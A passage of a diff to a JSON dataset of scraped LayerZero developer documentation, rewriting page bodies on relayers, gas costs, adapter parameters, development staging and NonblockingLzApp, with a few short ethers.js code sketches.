0x9e13017d416cdf0816bccac744760dd1c374cd20 Optimism: 
0x97597016f7dac89e55005105fc755c0513973fa8 Fantom: 0x9b743b9846230b657546fb942c6b11a23cfecd9a DFK: 0x7cfb4fadedc96793f844371d8498f4fdcd37da61 Dexalot: 0xab38efc6917086576137e4927af3a4d57da5f00c Moonbeam: 0xa85bfaa7bec20e014e5c29cb3536231116f3f789 Harmony: 0xb099d5a9652a80ff8f4234bde00f66531aa91c50 Celo: 0x894a918a9c2bfa6d32874e40ef4bba75b820b17c Fuse: 0x340b5e5e90a6d177e7614222081e0f9cdd54f25c Klaytn: 0xd682ecf100f6f4284138aa925348633b0611ae21 Metis: 0xd682ecf100f6f4284138aa925348633b0611ae21 CoreDAO: 0xb0487596a0b62d1a71d0c33294bd6eb635fc6b09 Gnosis: 0xd682ecf100f6f4284138aa925348633b0611ae21 zkSync: 0x2DCC8cFb612fDbC0Fb657eA1B51A6F77b8b86448 OKX (OKT): 0xd682ecf100f6f4284138aa925348633b0611ae21 Linea: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Base: 0x53fd4c4fbbd53f6bc58cae6704b92db1f360a648 Sepolia: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Meter: 0x0e8738298a8e437035e3aebd57f8dddc1a1bc44a Polygon zkEVM: 0x00c5c0b8e0f75ab862cbaaecfff499db555fbdd2 Kava: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tenet: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Canto: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Aptos: 0x47a30bcdb5b5bdbf6af883c7325827f3e40b3f52c3538e9e677e68cf0c0db060 Meritcircle: 0x3aCAAf60502791D199a5a5F0B173D78229eBFe32 Mantle: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Zora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Loot: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Telos: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Tomo: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff opBNB: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Shimmer: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Aurora: 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Lif3: 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Previous Google Cloud Oracle Next Chainlink Oracle Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1450,7 +1450,7 @@ { "title": "Develop a Relayer", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/develop-a-relayer", - "body": "Develop a Relayer To run your own Relayer, follow these high-level requirements for each chain: Deploy and maintain a contract that implements the ILayerZeroRelayerV2 interface. A reference Relayer implementation can be found here . Make sure your Relayer contract has access to up-to-date gas price information for all destination chains in order to accurately estimate transaction delivery fees. Configure your application to use your custom Relayer contract by calling setConfig in the Endpoint contract. More information about setting a custom configuration can be found here . Have access to your own nodes' RPC + WS (or rely on one or more providers). Maintain and balance wallets used for delivering messages/payloads. Create an off-chain service that listens to the Packet event emitted by UltraLightNodeV2 on the source chain, waits for the configured number of confirmations, and calls validateTransactionProof in UltraLightNodeV2 on the destination chain, providing data from the event and the transaction proof. A reference implementation of transaction proof generation can be found here . The off-chain Relayer is implementation-agnostic. As long as it performs the core function of delivering the message, the implementation is open to interpretation and can be modified. Previous Overview Next LayerZero Relayer Last modified 16d ago", + "body": "Develop a Relayer To run your own Relayer, follow these high-level requirements for each chain: Deploy and maintain a contract that implements the ILayerZeroRelayerV2 interface. A reference Relayer implementation can be found here . 
Make sure your Relayer contract has access to up-to-date gas price information for all destination chains in order to accurately estimate transaction delivery fees. Configure your application to use your custom Relayer contract by calling setConfig in the Endpoint contract. More information about setting a custom configuration can be found here . Have access to your own nodes' RPC + WS (or rely on one or more providers). Maintain and balance wallets used for delivering messages/payloads. Create an off-chain service that listens to the Packet event emitted by UltraLightNodeV2 on the source chain, waits for the configured number of confirmations, and calls validateTransactionProof in UltraLightNodeV2 on the destination chain, providing data from the event and the transaction proof. A reference implementation of transaction proof generation can be found here . The off-chain Relayer is implementation-agnostic. As long as it performs the core function of delivering the message, the implementation is open to interpretation and can be modified. Previous Overview Next LayerZero Relayer Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1458,7 +1458,7 @@ { "title": "LayerZero Relayer", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/layerzero-relayer", - "body": "LayerZero Relayer The Relayer run by LayerZero Labs, and the reference implementation. User Applications that opt in to the default configuration will use the LayerZero Labs Relayer. LayerZero Labs runs and maintains a Relayer as a production asset for the ecosystem. Gas Convention The LayerZero Relayer assumes only a base amount of gas for the destination contract call, e.g. 200k gas for a call on Ethereum. This will only be enough for very simple applications. If your app requires more gas, please use the adapter parameters specified here. Previous Develop a Relayer Next Max Proof Cost Estimate Last modified 4mo ago", + "body": "LayerZero Relayer The Relayer run by LayerZero Labs, and the reference implementation. User Applications that opt in to the default configuration will use the LayerZero Labs Relayer. LayerZero Labs runs and maintains a Relayer as a production asset for the ecosystem. Gas Convention The LayerZero Relayer assumes only a base amount of gas for the destination contract call, e.g. 200k gas for a call on Ethereum. This will only be enough for very simple applications. If your app requires more gas, please use the adapter parameters specified here. 
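To illustrate, here is a hedged TypeScript (ethers v5) sketch of the commonly used version-1 adapter-params encoding (a uint16 version followed by a uint256 gas amount) and of quoting the resulting fee through the OmniCounter estimateFee helper shown earlier in this document; the contract address, RPC URL, and the 350000 gas figure are placeholders. Note that adapter params only take effect if the UA actually passes them into _lzSend.

import { ethers } from 'ethers';

async function quote() {
  // Version-1 adapter params: uint16 version (1) + uint256 extra gas for the destination call.
  // 350000 is an arbitrary example; size it to what your lzReceive logic needs.
  const adapterParams = ethers.utils.solidityPack(['uint16', 'uint256'], [1, 350000]);

  // estimateFee as defined on the OmniCounter example shown earlier (placeholders below).
  const counter = new ethers.Contract(
    '0xYourOmniCounter',
    ['function estimateFee(uint16 _dstChainId, bool _useZro, bytes _adapterParams) view returns (uint nativeFee, uint zroFee)'],
    new ethers.providers.JsonRpcProvider('https://rpc.example')
  );
  const [nativeFee] = await counter.estimateFee(10132, false, adapterParams);
  console.log(`send this much native fee with the call: ${nativeFee.toString()}`);
}

quote().catch(console.error);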
Previous Develop a Relayer Next Max Proof Cost Estimate Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1466,7 +1466,7 @@ { "title": "Max Proof Cost Estimate", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/max-proof-cost-estimate", - "body": "Max Proof Cost Estimate Gas-report measurements of ProverMock.verifyReceipt against sampled blocks (Solc version: 0.7.6, Optimizer enabled: true, Runs: 200, Block limit: 10000000 gas; the usd column was empty in every run). ProverMock deployment: 1052934 gas (1052946 in two of the Binance Smart Chain runs), 10.5 % of the block limit. verifyReceipt gas per block is listed as min / max / avg; the number of calls equals the block's transaction count.
Ethereum
Block 0x26aa36d95218cabf8a7fa99ab30a3036176f35770135c9247beaf95df7a3bd1e (24 txs): 61174 / 99524 / 84373
Block 0x0752d5256a7d45734130b4ec6beb94a0c602fe687788dc513270c64c918e2aad (5 txs): 68313 / 90113 / 82194
Block 0x00bd18eff5cf2aa23f5625a65776e57bdb8d570849f822be20011b03eff7f515 (77 txs): 62892 / 182571 / 93588
Block 0xb0857894026c1b5c9e93d632b2ddb574723ba1be37f7f5341c4152a4669acc2e (146 txs): 87385 / 156948 / 101622
Block 0xad903a6a1ae4a8c4e504d2441ff5f41247276d5db627e06dd9d0abb10bc1a608 (231 txs): 80559 / 240303 / 114792
Avalanche
Block 0x4a2fa85017155bc19f133a1039a1316f5a7bd28544c5e24b702907a9a403fb20 (15 txs, snowtrace link: https://snowtrace.io/block/11010359 ): 56104 / 126950 / 94761
Block 0x40d05100055202d5ec8a2347703ae231a76070c93e65084642d25939955a8186 (7 txs, snowtrace link: https://snowtrace.io/block/11010351 ): 56080 / 104739 / 89506
Block 0xbbaab14f777b123a214be3c7706bc9cd587ce41908245a256ec309f6c42c72dc (54 txs, snowtrace link: https://snowtrace.io/block/11010459 ): 57678 / 125721 / 93626
Block 0xdf0759292a69988b88e04b65352c447488522bd0a795988cbfb1a37354f70a87 (62 txs, snowtrace link: https://snowtrace.io/block/11008999 ): 84712 / 265574 / 91252
Block 0x8457411b586c7844172b9aecd66be5e81ad7386cac48ee37a90d5c6a554dc724 (36 txs, snowtrace link: https://snowtrace.io/block/11007767 ): 57130 / 162222 / 100705
Binance Smart Chain
Block 0x0eab559e2907f57c799a7d0c7f8c19566061b64b0f770ee26e343abe60918714 (108 txs, bscscan link: https://bscscan.com/block/15315394 ): 59252 / 220283 / 104817
Block 0x3e40e118a9d2b04582847b02d245375aaf0c047a2257a1242dff741d1045e5f7 (90 txs, bscscan link: https://bscscan.com/block/15315375 ): 63501 / 175032 / 102260
Block 0xea2560a73df07d39c2f16bf8f2a167d61f88ab9897a0d96483471e1252114a05 (99 txs, bscscan link: https://bscscan.com/block/15316129 ): 64086 / 175450 / 107524
Block 0x72656b7c47227f87bdfd67d3a96de84aba761fbfc884ece6f7c90b49cadaf5ec (216 txs, bscscan link: https://bscscan.com/block/15315774 ): 86135 / 283471 / 122172
Block 0xd083d890b4aeff1888236572c8a7c45f01c88dfbeb36dd119a32cbe754b6f942 (143 txs, bscscan link: https://bscscan.com/block/15315757 ): 87361 / 216799 / 107376
Polygon
Block 0x9b5778164dc8ae2724350a7614d619e886777a9d438b0157a25702541aab20cb (38 txs, polygonscan link: https://polygonscan.com/block/25018717 ): 64540 / 189234 / 113970
Block 0x226a10daf095bcc36fb59c7629128f95370a15f512cb4613e6253bc3bc0d4b37 (78 txs, polygonscan link: https://polygonscan.com/block/25019837 ): 65542 / 341630 / 114085
Block 0xf15823bce9f3f660fc14c82e3538bc92a9c76091e7c080efc5d0c73a77a07d5b (28 txs, polygonscan link: https://polygonscan.com/block/25020548 ): 68238 / 166723 / 102890
Block 0x3ede1d93dd20267922ec7a008d651768bb20f5b2ee572c8efc30e152715df942 (110 txs, polygonscan link: https://polygonscan.com/block/25020699 ): 76092 / 301332 / 111493
Arbitrum
Block 0x1e8b8bbfbe043c6514ca0d059a488edbdd5af94f18976ac9f3960b9a818ab623 (1 tx, arbiscan link: https://arbiscan.io/block/6197283 ): - / - / 52340
Block 0x439d1377c0bfba294a07f720be1b0958c64d33f1d9c471f0ef6d17fcb813e7b2 (2 txs, arbiscan link: https://arbiscan.io/block/6197266 ): 60769 / 73201 / 66985
Block 0xa31ad5e12ac1715b23f353012c1511cbf4c6be57bedf1d3d5e6e9faafee71494 (3 txs, arbiscan link: https://arbiscan.io/block/6196951 ): 59129 / 79875 / 72960
Block 0x0def97133f0006e041209c721e998ad499121f9e8bd455533cdda69b5965b8fe (11 txs, arbiscan link: https://arbiscan.io/block/6196815 ): 81024 / 171918 / 99101
Block 0xf119aefaccea7323a8faafd76706b22fd612b23a68a56a2a6ecc2fe5df27c9dc (5 txs, arbiscan link: https://arbiscan.io/block/6196814 ): 125488 / 173074 / 152762
Optimism N/A Fantom N/A Previous LayerZero Relayer Next - Ecosystem Oracle Last modified 3mo ago", + "body": "Max Proof Cost Estimate Ethereum Block hash: 0x26aa36d95218cabf8a7fa99ab30a3036176f35770135c9247beaf95df7a3bd1e Transactions: 24 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 61174 99524 84373 24 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x0752d5256a7d45734130b4ec6beb94a0c602fe687788dc513270c64c918e2aad Transactions: 5 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 68313 90113 82194 5 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | 
------------- Block hash: 0x00bd18eff5cf2aa23f5625a65776e57bdb8d570849f822be20011b03eff7f515 Transactions: 77 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 62892 182571 93588 77 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xb0857894026c1b5c9e93d632b2ddb574723ba1be37f7f5341c4152a4669acc2e Transactions: 146 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 87385 156948 101622 146 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xad903a6a1ae4a8c4e504d2441ff5f41247276d5db627e06dd9d0abb10bc1a608 Transactions: 231 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 80559 240303 114792 231 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Avalanche Block hash: 0x4a2fa85017155bc19f133a1039a1316f5a7bd28544c5e24b702907a9a403fb20 Transactions: 15 snowtrace link: https://snowtrace.io/block/11010359 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 56104 126950 94761 15 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x40d05100055202d5ec8a2347703ae231a76070c93e65084642d25939955a8186 Transactions: 7 snowtrace link: https://snowtrace.io/block/11010351 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 56080 104739 89506 7 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xbbaab14f777b123a214be3c7706bc9cd587ce41908245a256ec309f6c42c72dc Transactions: 54 snowtrace link: https://snowtrace.io/block/11010459 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 
.6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 57678 125721 93626 54 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xdf0759292a69988b88e04b65352c447488522bd0a795988cbfb1a37354f70a87 Transactions: 62 arbiscan link: https://snowtrace.io/block/11008999 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 84712 265574 91252 62 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x8457411b586c7844172b9aecd66be5e81ad7386cac48ee37a90d5c6a554dc724 Transactions: 36 arbiscan link: https://snowtrace.io/block/11007767 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 57130 162222 100705 36 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Binance Smart Chain Block hash: 0x0eab559e2907f57c799a7d0c7f8c19566061b64b0f770ee26e343abe60918714 Transactions: 108 arbiscan link: https://bscscan.com/block/15315394 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 59252 220283 104817 108 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x3e40e118a9d2b04582847b02d245375aaf0c047a2257a1242dff741d1045e5f7 Transactions: 90 arbiscan link: https://bscscan.com/block/15315375 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | \u0000 | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 63501 175032 102260 90 - | \u0000 | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xea2560a73df07d39c2f16bf8f2a167d61f88ab9897a0d96483471e1252114a05 Transactions: 99 arbiscan link: https://bscscan.com/block/15316129 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) 
| | | | | | | ProverMock verifyReceipt 64086 175450 107524 99 - | \u0000 | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x72656b7c47227f87bdfd67d3a96de84aba761fbfc884ece6f7c90b49cadaf5ec Transactions: 216 arbiscan link: https://bscscan.com/block/15315774 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 86135 283471 122172 216 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052946 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xd083d890b4aeff1888236572c8a7c45f01c88dfbeb36dd119a32cbe754b6f942 Transactions: 143 arbiscan link: https://bscscan.com/block/15315757 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 87361 216799 107376 143 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052946 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Polygon Block hash: 0x9b5778164dc8ae2724350a7614d619e886777a9d438b0157a25702541aab20cb Transactions: 38 polygonscan link: https://polygonscan.com/block/25018717 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 64540 189234 113970 38 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x226a10daf095bcc36fb59c7629128f95370a15f512cb4613e6253bc3bc0d4b37 Transactions: 78 polygonscan link: https://polygonscan.com/block/25019837 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 65542 341630 114085 78 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xf15823bce9f3f660fc14c82e3538bc92a9c76091e7c080efc5d0c73a77a07d5b Transactions: 28 polygonscan link: https://polygonscan.com/block/25020548 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 68238 166723 102890 28 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 
1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x3ede1d93dd20267922ec7a008d651768bb20f5b2ee572c8efc30e152715df942 Transactions: 110 polygonscan link: https://polygonscan.com/block/25020699 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 76092 301332 111493 110 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Arbitrum Block hash: 0x1e8b8bbfbe043c6514ca0d059a488edbdd5af94f18976ac9f3960b9a818ab623 Transactions: 1 arbiscan link: https://arbiscan.io/block/6197283 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt - - 52340 1 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x439d1377c0bfba294a07f720be1b0958c64d33f1d9c471f0ef6d17fcb813e7b2 Transactions: 2 arbiscan link: https://arbiscan.io/block/6197266 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 60769 73201 66985 2 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xa31ad5e12ac1715b23f353012c1511cbf4c6be57bedf1d3d5e6e9faafee71494 Transactions: 3 arbiscan link: https://arbiscan.io/block/6196951 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 59129 79875 72960 3 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x0def97133f0006e041209c721e998ad499121f9e8bd455533cdda69b5965b8fe Transactions: 11 arbiscan link: https://arbiscan.io/block/6196815 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 81024 171918 99101 11 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 
Block hash: 0xf119aefaccea7323a8faafd76706b22fd612b23a68a56a2a6ecc2fe5df27c9dc, Transactions: 5 (arbiscan link: https://arbiscan.io/block/6196814). verifyReceipt min / max / avg: 125488 / 173074 / 152762. Optimism N/A Fantom N/A Previous LayerZero Relayer Next - Ecosystem Oracle Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1474,7 +1474,7 @@ { "title": "Overview", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/overview", - "body": "Overview Scope of Work Relay proof across chains, and pay the cost for lzReceive execution. Gas Composition The receiving side smart contract overhead + proof cost + lzReceive. Plus, the gas varies from chain to chain. lzReceive we will have a default configuration per chain: Text Overhead Max Proof Cost (Estimate) default lzReceive Ethereum 240303 Avalanche 265574 BSC 283471 Polygon 341630 Arbitrum 173074 Optimism N/A Fantom Need Valid RPC Market Risk Charging native token A at the source chain, but paying native token B at the destination chain. The business itself is long A / short B, can hedge the market risk with short A / long B in exchanges, or balance the book timely. Ecosystem - Previous Relayer Next Develop a Relayer Last modified 15d ago", + "body": "Overview Scope of Work Relay the proof across chains, and pay the cost of lzReceive execution. Gas Composition The receiving side smart contract overhead + proof cost + lzReceive. The gas also varies from chain to chain. For lzReceive we will have a default configuration per chain. Max Proof Cost (Estimate) per chain: Ethereum 240303, Avalanche 265574, BSC 283471, Polygon 341630, Arbitrum 173074, Optimism N/A, Fantom Need Valid RPC. Market Risk Charging native token A at the source chain, but paying native token B at the destination chain. The business itself is long A / short B; it can hedge the market risk with short A / long B on exchanges, or balance the book in a timely manner. Ecosystem - Previous Relayer Next Develop a Relayer Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1482,7 +1482,7 @@ { "title": "Development Staging", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced/development-staging", - "body": "Development Staging Local Use Endpoint Mock Use the endpoint mock to locally test your app logic fully. The mock gives you an abstraction of LayerZero messaging behavior and allows you to focus on your domain logic. Portable Configuration LayerZero assumes contracts on different chains whitelist the counterparts on the other chains. An N-chain UA would need to wire N^2 paths accurately. If the app has multiple configurations for each path, e.g. token swap, it will be even harder. The problem will compound if the UA needs to add new chains (worse if with different runtimes like EVM and Solana contracts). It is very important for your configuration script unit-testable and portable to production. Testnet Smoke-Test Your Deployment After your deployment and configuration, you should do a quick smoke test to test whether message pathways are properly wired before shipping to production.
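A minimal smoke-test sketch (ethers.js assumed; the OmniCounter-style contract, its counter() getter, and the polling interval are placeholders, not part of the official docs):

// Hypothetical smoke test: send one message across a freshly wired pathway
// and poll the destination until it arrives. srcApp/dstApp are connected
// ethers.Contract instances for the same UA deployed on two chains.
async function smokeTest(srcApp, dstApp, dstChainId, fee) {
  const before = await dstApp.counter(); // destination-side state (placeholder getter)
  await (await srcApp.incrementCounter(dstChainId, { value: fee })).wait();
  for (let i = 0; i < 60; i++) { // wait up to ~5 minutes
    if ((await dstApp.counter()).gt(before)) return console.log("pathway OK");
    await new Promise((resolve) => setTimeout(resolve, 5000));
  }
  throw new Error("message not delivered - check trusted remotes and fees");
}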
Mainnet If you are doing everything right in the Testnet stage, Mainnet should just be repeating the process but with more caution. Good luck with the launch! EVM Guides - Previous Advanced Next Relayer Adapter Parameters Last modified 11mo ago", + "body": "Development Staging Local Use Endpoint Mock Use the endpoint mock to locally test your app logic fully. The mock gives you an abstraction of LayerZero messaging behavior and allows you to focus on your domain logic. Portable Configuration LayerZero assumes contracts on different chains whitelist the counterparts on the other chains. An N-chain UA would need to wire N^2 paths accurately. If the app has multiple configurations for each path, e.g. token swap, it will be even harder. The problem will compound if the UA needs to add new chains (worse if with different runtimes like EVM and Solana contracts). It is very important that your configuration script be unit-testable and portable to production. Testnet Smoke-Test Your Deployment After your deployment and configuration, you should do a quick smoke test to check whether message pathways are properly wired before shipping to production. Mainnet If you are doing everything right in the Testnet stage, Mainnet should just be repeating the process but with more caution. Good luck with the launch! EVM Guides - Previous Advanced Next Relayer Adapter Parameters Last modified 1yr ago", "labels": [ "Documentation" ] @@ -1490,7 +1490,7 @@ { "title": "NonblockingLzApp", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced/nonblockinglzapp", - "body": "NonblockingLzApp As mentioned in the Message Ordering section, the Endpoint will catch any unhandled error/exception from the downstream UA and block the message queue from the source contract at the source chain to all destination contracts at the destination chain, until the stored message has been retried successfully. However, UA can write a nonblocking receiver as a proxy layer to try-catch all errors/exceptions locally for future retry so that the message queue at the destination LayerZero Endpoint will never be blocked. We provide a NonblockingLzApp abstract contract as a template contract for UAs to build on. UAs simply need to inherit the class and override the _LzReceive internal function. Be sure to setTrustedRemote() to enable inbound communication on all contracts! solidity-examples/NonblockingLzApp.sol at main LayerZero-Labs/solidity-examples GitHub Previous Relayer Adapter Parameters Next - EVM Guides UA Custom Configuration Last modified 3mo ago", + "body": "NonblockingLzApp As mentioned in the Message Ordering section, the Endpoint will catch any unhandled error/exception from the downstream UA and block the message queue from the source contract at the source chain to all destination contracts at the destination chain, until the stored message has been retried successfully. However, a UA can write a nonblocking receiver as a proxy layer to try-catch all errors/exceptions locally for future retry, so that the message queue at the destination LayerZero Endpoint will never be blocked. We provide a NonblockingLzApp abstract contract as a template contract for UAs to build on. UAs simply need to inherit the class and override the _LzReceive internal function. Be sure to setTrustedRemote() to enable inbound communication on all contracts!
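That wiring step as a sketch (ethers.js assumed; the 40-byte remote + local path format is the one described in the StoredPayload section, and the contract variables are placeholders):

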